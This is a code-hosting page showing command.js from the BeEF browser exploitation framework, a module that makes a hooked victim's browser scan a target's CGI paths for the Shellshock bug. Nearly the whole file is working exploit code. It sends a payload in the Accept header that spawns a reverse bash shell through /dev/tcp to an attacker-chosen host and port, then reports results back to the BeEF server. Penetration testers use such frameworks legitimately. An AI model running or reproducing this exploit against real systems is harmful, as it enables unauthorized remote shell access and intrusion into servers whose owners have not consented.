Hiddenden/beef
2
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
2d23692fd6e45a078d056f554d708a83cdc2b9d8
beef/modules/exploits/shell_shock_scanner/command.js
Ben Passmore 9f1e8f5e8d Updated copyright
2019-01-01 11:57:28 +10:00

74 lines
2.2 KiB
JavaScript
Raw Blame History

//
// Copyright (c) 2006-2019 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
beef.execute(function() {
var rproto = '<%= @rproto %>';
var rhost = '<%= @rhost %>';
var rport = '<%= @rport %>';
var lhost = '<%= @lhost %>';
var lport = '<%= @lport %>';
var target = rproto + '://' + rhost + ':' + rport;
var method = '<%= @method %>';
var wait = '<%= @wait %>';
get_cgi = function(uri) {
try {
var payload = "() { :;}; /bin/bash -c /bin/bash -i >& /dev/tcp/"+lhost+"/"+lport+" 0>&1 &";
var xhr = new XMLHttpRequest();
xhr.open(method, target+uri, true);
xhr.onload = function () {
};
xhr.onreadystatechange = function () {
if (xhr.readyState == 4 && xhr.status == 200) {
beef.debug("[command #<%= @command_id %>] Response: " + xhr.response);
}
}
xhr.setRequestHeader("Accept", payload);
xhr.send(null);
} catch (e){
beef.debug("[command #<%= @command_id %>] Something went wrong: " + e.message);
}
}
// add scripts to queue
var requests = new Array(
<%=
scripts = []
File.open("#{$root_dir}/modules/exploits/shell_shock_scanner/shocker-cgi_list", 'r') do |file_handle|
file_handle.each_line do |line|
uri = line.chomp!
next if uri =~ /^#/
next if uri.nil?
scripts << "'#{uri}'"
end
end
scripts.shuffle.join(",\n")
%>
);
// process queue
beef.debug("[command #<%= @command_id %>] Starting Shellshock scan of "+target+" ("+requests.length+" URLs)");
beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=starting scan of "+target+" ("+requests.length+" URLs)");
var timeout = wait * requests.length + 10;
var handle = setInterval(function() {
if (requests.length > 0) {
get_cgi(requests.pop());
} else cleanup();
}, wait*1000);
// clean up
cleanup = function() {
if (handle) {
beef.debug("[command #<%= @command_id %>] Killing timer [ID: " + handle + "]");
clearInterval(handle);
handle = 0;
beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=scan complete");
}
}
setTimeout("cleanup();", timeout*1000);
});
Reference in New Issue View Git Blame Copy Permalink